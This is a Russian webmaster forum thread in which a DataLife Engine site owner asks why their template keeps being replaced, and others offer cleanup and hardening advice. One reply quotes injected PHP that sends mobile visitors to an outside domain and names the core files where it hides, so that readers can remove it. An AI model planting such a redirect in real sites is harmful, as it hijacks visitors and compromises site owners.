Меняется шаблон

Тема в разделе "DataLife Engine", создана пользователем chandleryp, 10 фев 2013.

  1. chandleryp

    chandleryp

    Регистрация:
    9 фев 2013
    Сообщения:
    2
    Симпатии:
    0
    ДД! версия дле 9.3. раз в месяц меняется шаблон на какуюто нелепость. пароли менял на фтп и все остальное... но всеравно меняется на левую херню (херня не моя а типа сайт другой)
    --- добавлено: 9 фев 2013 в 20:21 ---
    Подскажите как это действие прекратить ?
     
  2. Antonved

    Antonved

    Регистрация:
    16 фев 2013
    Сообщения:
    27
    Симпатии:
    3
    Скорее всего на сайте вирус, сначала проверте сайт на вирусы, а уже потом меняйте пароли.
     
  3. bogodaev

    bogodaev

    Регистрация:
    20 дек 2012
    Сообщения:
    58
    Симпатии:
    13
    Когда вы ставили шаблон или модуль вы поймали вирус.
     
  4. idea_all

    idea_all

    Регистрация:
    23 фев 2013
    Сообщения:
    5
    Симпатии:
    0
    попробуйте прописать для всех папок права "только чтение" и похорошему бы скачать весь сайт и приверить на вирусы, касперыч у меня вирусы сразу нашел...
     
  5. usamchik

    usamchik

    Регистрация:
    21 фев 2013
    Сообщения:
    47
    Симпатии:
    6
    Первым делом НЕОБХОДИМО обновиться до актуальной версии DLE. Следить за заплатками от официального производителя. Если движок не нуленый, разработчики присылают заплатки на почту.
    Проверить сайт на вирусы.
    Отказаться от бестолковых, уязвимых модулей, или допиливать самому.
    Пароли использовать посложнее, с цифрами, заглавными буквами и тд... (возможно брутят)
     
  6. Павел Брис

    Павел Брис

    Регистрация:
    12 мар 2013
    Сообщения:
    2
    Симпатии:
    0
    проверь файлик с кофигурацией или файлик dbconfig.php

    Делаем следующее:
    1. Открываем engine/data/config.php и dbconfig.php
    2. Ищем такой код:

    $iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
    $android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
    $palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
    $berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
    $ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
    if ($iphone || $android || $palmpre || $ipod || $berry === true) {
    header('Location: http://statuses.ws/');
    }


    3. Сносим к чертям собачьим.
    4. Ищем engine/engine.php и там должно быть аж два подобных кода, кстати вставлены они у каждого в разные строчки, так что не буду называть точный номер. Сносим все это.
    5. Ищем engine/init.php - там тоже все это убираем
    6. В index.php такая штука тоже есть, тоже убираем.
     
  7. souler

    souler

    Регистрация:
    5 дек 2012
    Сообщения:
    7
    Симпатии:
    0

    Cпасибо, мне лично помогло)